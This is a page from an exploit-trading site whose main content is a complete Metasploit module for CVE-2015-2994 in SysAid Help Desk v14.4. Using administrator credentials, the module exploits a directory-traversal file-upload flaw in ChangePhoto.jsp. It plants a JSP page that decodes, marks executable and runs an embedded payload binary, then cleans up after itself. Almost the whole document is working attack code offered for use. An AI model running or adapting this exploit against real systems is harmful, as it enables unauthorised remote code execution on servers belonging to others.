0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SysAid Help Desk Administrator Portal Arbitrary File Upload Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'SysAid Help Desk Administrator Portal Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk. The vulnerability exists in the ChangePhoto.jsp in the administrator portal, which does not handle correctly directory traversal sequences and does not enforce file extension restrictions. You need to have an administrator account, but there is a Metasploit auxiliary module that can create one for you. This module has been tested in SysAid v14.4 in both Linux and Windows. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-2994'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Privileged' => false, 'Platform' => %w{ linux win }, 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ], [ 'SysAid Help Desk v14.4 / Linux', { 'Platform' => 'linux' } ], [ 'SysAid Help Desk v14.4 / Windows', { 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 3 2015')) register_options( [ OptPort.new('RPORT', [true, 'The target port', 8080]), OptString.new('TARGETURI', [ true, "SysAid path", '/sysaid']), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'Password for the specified username']), ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'errorInSignUp.htm'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /css\/master\.css\?v([0-9]{1,2})\.([0-9]{1,2})/ major = $1.to_i minor = $2.to_i if major == 14 && minor == 4 return Exploit::CheckCode::Appears elsif major > 14 return Exploit::CheckCode::Safe end end # Haven't tested in versions < 14.4, so we don't know if they are vulnerable or not return Exploit::CheckCode::Unknown end def authenticate res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'Login.jsp'), 'method' => 'POST', 'vars_post' => { 'userName' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } }) if res && res.code == 302 && res.get_cookies return res.get_cookies else return nil end end def upload_payload(payload, is_exploit) post_data = Rex::MIME::Message.new post_data.add_part(payload, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(8))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(10))}.jsp\"") data = post_data.to_s if is_exploit print_status("#{peer} - Uploading payload...") end res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'ChangePhoto.jsp'), 'method' => 'POST', 'cookie' => @cookie, 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'vars_get' => { 'isUpload' => 'true' } }) if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit print_status("#{peer} - Payload uploaded successfully") end return $1 else return nil end end def pick_target unless target.name == 'Automatic' return target end print_status("#{peer} - Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], url), 'method' => 'GET', 'cookie' => @cookie, 'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) } }) if res && res.code == 200 if res.body.to_s =~ /Linux/ register_files_for_cleanup('webapps/' + url) return targets[1] elsif res.body.to_s =~ /Windows/ register_files_for_cleanup('root/' + url) return targets[2] end end nil end def generate_jsp_payload opts = {:arch => @my_target.arch, :platform => @my_target.platform} exe = generate_payload_exe(opts) base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(rand(6)+3) ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = rand_text_alpha(rand(8) + 3) var_ostream = rand_text_alpha(rand(8) + 3) var_buf = rand_text_alpha(rand(8) + 3) var_decoder = rand_text_alpha(rand(8) + 3) var_tmp = rand_text_alpha(rand(8) + 3) var_path = rand_text_alpha(rand(8) + 3) var_proc2 = rand_text_alpha(rand(8) + 3) if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); | else chmod = '' cleanup = '' end jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, '') jsp = jsp.gsub(/\x0a/, '') return jsp end def exploit @cookie = authenticate unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end print_status("#{peer} - Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end print_status("#{peer} - Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end jsp_payload = generate_jsp_payload jsp_path = upload_payload(jsp_payload, true) unless jsp_path fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end if @my_target == targets[1] register_files_for_cleanup('webapps/' + jsp_path) else register_files_for_cleanup('root/' + jsp_path) end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', 'cookie' => @cookie, 'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) } }) end end # 0day.today [2024-09-19] #